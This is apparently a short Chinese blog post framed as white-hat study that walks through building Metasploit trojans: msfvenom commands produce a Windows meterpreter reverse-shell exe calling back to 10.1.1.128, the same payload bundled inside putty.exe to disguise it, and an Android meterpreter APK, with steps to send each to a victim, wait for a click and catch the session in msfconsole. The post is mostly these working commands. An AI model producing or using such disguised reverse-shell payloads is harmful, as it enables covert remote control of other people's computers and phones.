白帽子学习

tech2025-12-03  26

1 简单exe木马

制作exe木马 # msfvenom -p windows/meterpreter/reverse_tcp lhost=10.1.1.128 lport=4444 -f exe >test2.exe

发送到受害者主机等待被点击

在msfconsole下伺机监视

当用户点击exe文件时 受害者IP地址为10.1.1.130,端口号为1099

2 木马捆绑

制作捆绑木马 # msfvenom -p windows/meterpreter/reverse_tcp lhost=10.1.1.128 lport=4444 -x putty.exe -f exe >/root/test.exe

把木马发送到被攻击者电脑

远程登陆监视

在msfconsole下启动监视

当用户点击木马test.exe时 打入成功!从sessions中可以看出受害者主机ip地址为10.1.1.130,端口号1096

3 手机apk木马

制作手机安卓木马 # msfvenom -p android/meterpreter/reverse_tcp lhost=10.1.1.128 lport=4545 R >test2.apk

发送到受害者手机,并安装

msfconsole远程监听

手机上点击软件时

是否可以捆绑突破内网?

最新回复(0)